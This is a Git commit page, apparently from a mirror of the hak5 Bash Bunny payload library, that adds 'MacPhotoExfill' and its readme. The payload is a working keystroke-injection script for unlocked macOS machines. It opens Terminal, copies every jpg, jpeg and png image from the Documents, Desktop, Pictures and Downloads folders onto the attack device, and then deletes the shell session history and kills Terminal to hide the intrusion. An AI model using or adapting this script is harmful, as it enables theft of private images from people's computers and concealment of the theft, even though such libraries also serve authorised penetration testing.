hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #586 from afsh4ck/master 

Exfilter all the images from the principal folders on unlocked MacOS …
revert-583-master
hak5glytch 2023-06-06 13:55:56 -05:00 committed by GitHub
parent 4da1333ab9 e2b0e495b3
commit 38e84fa604
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 119 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

69
payloads/library/exfiltration/MacPhotoExfill/payload.txt Normal file
View File

@ -0,0 +1,69 @@
#!/bin/bash
#
# Title: MacPhotoExfill
# Author: afsh4ck
# Version: 1.0
# Target: MacOS
# Category: Exfiltration
#
# Exfilter all the images from the principal folders on unlocked MacOS targets.
# Stashes them in /loot/MacPhotoExfill
#
# Purple Setup
# Amber..............Attack Mode ON
# Green..............Finished
LED SETUP
ATTACKMODE HID STORAGE ECM_ETHERNET
GET TARGET_HOSTNAME
QUACK DELAY 1000
lootdir=loot/MacPhotoExfill/$TARGET_HOSTNAME
mkdir -p /root/udisk/$lootdir
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2000
LED ATTACK
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Desktop;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Pictures;
QUACK ENTER
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads;
QUACK ENTER
QUACK STRING cp Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ;
QUACK ENTER
QUACK STRING cp Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ;
QUACK ENTER
QUACK STRING cp Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ;
QUACK ENTER
QUACK STRING cp Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ;
QUACK ENTER
# We can control the time for the payload execution
QUACK DELAY 25000
QUACK CTRL C
# Cleanup and delete proofs
LED M SLOW
QUACK ENTER
QUACK ENTER
# Eject BB storage
QUACK STRING diskutil eject /Volumes/BashBunny/
QUACK ENTER
QUACK DELAY 500
# Remove terminal history from current session (commands used in attack won't be visible with the history command)
QUACK STRING rm -r ~/.zsh_sessions
QUACK ENTER
QUACK DELAY 500
# Exit terminal
QUACK STRING killall Terminal
QUACK ENTER
# Ensure sincronization
sync
LED FINISH

50
payloads/library/exfiltration/MacPhotoExfill/readme.md Normal file
View File

@ -0,0 +1,50 @@
# Mac Photo Exfilter for the BashBunny
* ___ ___ ___ ___ ___ ___ ___
* / /\ / /\ / /\ /__/\ / /\ / /\ /__/|
* / /::\ / /:/_ / /:/_ \ \:\ / /::\ / /:/ | |:|
* / /:/\:\ / /:/ /\ / /:/ /\ \__\:\ / /:/\:\ / /:/ | |:|
* / /:/ /::\ / /:/ /:// /:/ /::\ ___ / /::\ / /:/ /::\ / /:/ ___ __| |:|
* /__/:/ /:/\:\/__/:/ /://__/:/ /:/\:\/__/\ /:/\:\/__/:/ /:/\:\/__/:/ / /\/__/\_|:|____
* \ \:\/:/__\/\ \:\/:/ \ \:\/:/ /:/\ \:\/:/__\/\ \:\/:/__\/\ \:\ / /:/\ \:\/:::::/
* \ \::/ \ \::/ \ \::/ /:/ \ \::/ \ \::/ \ \:\ /:/ \ \::/---
* \ \:\ \ \:\ \__\/ /:/ \ \:\ \ \:\ \ \:\/:/ \ \:\
* \ \:\ \ \:\ /__/:/ \ \:\ \ \:\ \ \::/ \ \:\
* \__\/ \__\/ \__\/ \__\/ \__\/ \__\/ \__\/
* Author: afsh4ck
* Version: 1.0
* Target: MacOS
* Tested on: Ventura 13.3.1
* Category: Exfiltration
# DESCRIPTION
Exfilter all the images from the principal folders on unlocked MacOS targets.
Stashes them in /loot/MacPhotoExfill/$hostname grouped in subfolders:
| Subfolder | Content |
| ------------------ | -------------------------------------------- |
| Documents | All the images in /root/Documents folder |
| Desktop | All the images in /root/Desktop folder |
| Pictures | All the images in /root/Pictures folder |
| Downloads | All the images in /root/Downloads folder |
# IMAGE FORMATS
| Format |
| ------------------ |
| .jpg |
| .jpeg |
| .png |
# LED STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Green | Setup |
| Yellow Blink | Attack Mode ON |
| Purple Slow | Cleaning all proofs |
| Green Fixed | Finish |